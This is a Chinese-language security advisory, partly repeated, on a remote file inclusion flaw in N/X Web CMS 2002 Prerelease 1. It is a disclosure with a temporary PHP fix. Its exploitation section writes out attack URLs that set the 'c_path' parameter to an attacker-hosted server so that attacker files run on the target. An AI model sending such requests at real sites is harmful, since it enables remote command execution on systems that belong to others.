N/X Web内容管理系统远程文件包含漏洞
添加时间:
2005-10-01
系统编号:
WAVDB-00759
BUGTRAQ: 6500
影响版本:
N/X Web Content Management System 2002 Prerelease 1
程序介绍:
解决方案:
临时解决方法:
如果您不能立刻安装补丁或者升级,建议您采取以下措施以降低威胁:
* 在受此漏洞影响的脚本中添加如下代码:
if (!file_exists($c_path."index.php")){ die("Path not found."); }
厂商补丁:
N/X
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://nxwcms.sourceforge.net/
信息来源:
<*来源:Frog Man (leseulfrog@hotmail.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104152465911727&w=2
*>
2005-10-01
系统编号:
WAVDB-00759
BUGTRAQ: 6500
影响版本:
N/X Web Content Management System 2002 Prerelease 1
程序介绍:
N/X Web Content Management System是一款方便建立和维护站点的系统。
漏洞分析:
N/X Web CMS多个脚本对用户提交的参数数据缺少正确过滤,远程攻击者可以利用这个漏洞提恶意WEB请求而以WEB权限在系统上执行任意命令。
CMS包含的'nx/common/cds/menu.inc.php'和'nx/common/dbo/datasets.php'脚本对用户提交的 'c_path'参数缺少正确检查,攻击者可以在自己控制的服务器上提供恶意文件,并提交指向恶意文件的路径作为'c_path'参数的请求,可导致以 WEB进程权限在系统上执行任意命令。
漏洞利用:
http://[target]/nx/common/cds/menu.inc.php?c_path=http://[attacker]/ with :http://[attacker]/common/lib/launch.inc.php
http://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/ with :http://[attacker]/common/dbo/saveset.php
http://[attacker]/common/dbo/recordset.php
http://[attacker]/common/dbo/deleteset.php
http://[attacker]/common/dbo/updateset.php
http://[attacker]/common/dbo/insertset.php
解决方案:
临时解决方法:
如果您不能立刻安装补丁或者升级,建议您采取以下措施以降低威胁:
* 在受此漏洞影响的脚本中添加如下代码:
if (!file_exists($c_path."index.php")){ die("Path not found."); }
厂商补丁:
N/X
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://nxwcms.sourceforge.net/
信息来源:
<*来源:Frog Man (leseulfrog@hotmail.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104152465911727&w=2
*>